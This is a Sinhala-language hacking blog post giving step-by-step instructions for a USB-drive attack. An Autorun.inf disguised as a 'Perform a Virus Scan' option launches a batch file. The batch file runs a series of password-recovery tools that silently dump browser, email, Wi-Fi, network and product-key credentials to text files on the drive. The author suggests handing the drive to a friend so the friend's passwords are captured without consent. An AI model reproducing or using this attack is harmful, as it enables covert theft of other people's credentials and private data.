පෙන් එකෙන් හැක් කරමු. | Hack using pen drive.

පෙන් එකෙන් හැක් කරමු.


මුලින්ම කියන්න ඕනෙ ඔන්න අපි ga Domain එකකුත් දාගත්තා. දැන් නම් ඉතින් පොඩි ගතියක් තියෙනවා. හා හා අරවා මේවා ඕනෙ නෑ වැඩේ ගැන බලමු නෙ…

මෙන්න ගෙනාවා පට්ට හැකින් ටූල් එකක්. මේවගේ එ්වට උබලා කැමතියිනෙ. ඒ නිසාම තමයි දෙන්නෙ. හරි එහෙනම් ඉතින් මේකෙන් කරන්න පුළුවන් වැඩ ටික දාලාම පටන් ගන්නම්.


මෙන්න මේ ටික මෙකෙන් කරගන්න පුළුවන්.

 • Visited Link List
 • Internet Explora Cache List
 • Internet Explora Password List
 • Instance Massengers Account List
 • Installed Windows Update List
 • Mozilla cache List
 • cookie list
 • Mozilla History List
 • Search Queary List
 • Adapter Report
 • Network Password Report
 • TCP/UDP Port List
 • Product Key List
 • Protected Storage Password List
 • PST password List
 • Startup Programme List
 • Video Cache List


මේ ටික කරගත්තා කියන්නෙ ගොඩනෙ. හරි එහෙනම් වැඩේට බහිමු.

1. මුලින්ම නෝට්පෑඩ් එක ඕපන් කරගෙන පහල තියන කෝඩ් එක ඒකට කොපි කරගන්න.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan


2. දැන් මේ ෆයිල් එක Autorun.inf කියලා කැමති තැනක සේව් කරගන්න.

3. දැන් ආපහු නෝට්පෑඩ් එක ඕපන් කරගෙන මේ කෝඩ් එක ඒකට දාගන්න.


start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt


4. දැන් මේ ෆයිල් එක launch.bat කියන නමින් සේව් කරගන්න.


හරි එහෙනම් වැඩේ භාගයක් ඉවරයි. දැන් පෙන් එකට මේ හදාගත්ත ෆයිල් දෙක ‍කොපි කරගන්න. දැන් පෙන් එකේ තියෙන්න ඕනෙ Autorun.inf, launch.bat කියන ෆයිල් දෙක.


හරි එහෙනම් දැන් පෙන් එක යාළුවට වගේ දීලා බලන්න. යාළුවා මේ ෆයිල් එක ඕපන් කලාම වැඩේ ගොඩ. නෑ නෑ එහෙම කරන්න ඕනෙ නෑ. මේක ඔටෝරන් වෙනවා. ඒ නිසා පෙන් එක ගහලා Autorun Window එකෙන් Perform a Virus Scan තේරුව ගමන් පෙන් එක ඇතුලෙ අළුත් ෆයිල් හැදිලා පාස්වර්ඩ් සේව් වෙනවා.


හරි එහෙනම් මම කැපුනා. ආපහු මේ වගේ දෙයක් අරගෙන එන්නම්.


මගෙ බ්ලොග් පෝස්ට් කොපි කරාට කමක් නෑ, ඒත් සෝර්ස් එක නම් දාන්න ඕනෙ හොදේ. සමහරු නම් නමුත් වෙනස් කරලා තමන් ලිවුවා වගේ පෙන්නනවා. කමක් නෑ ඉතින්. දන්නො දනිති කියලාවත් කියමු.


මෙන්න එකතු වෙන්න අපේ හැකින් ෆෝරම් එකත් එක්ක.


Leave a Comment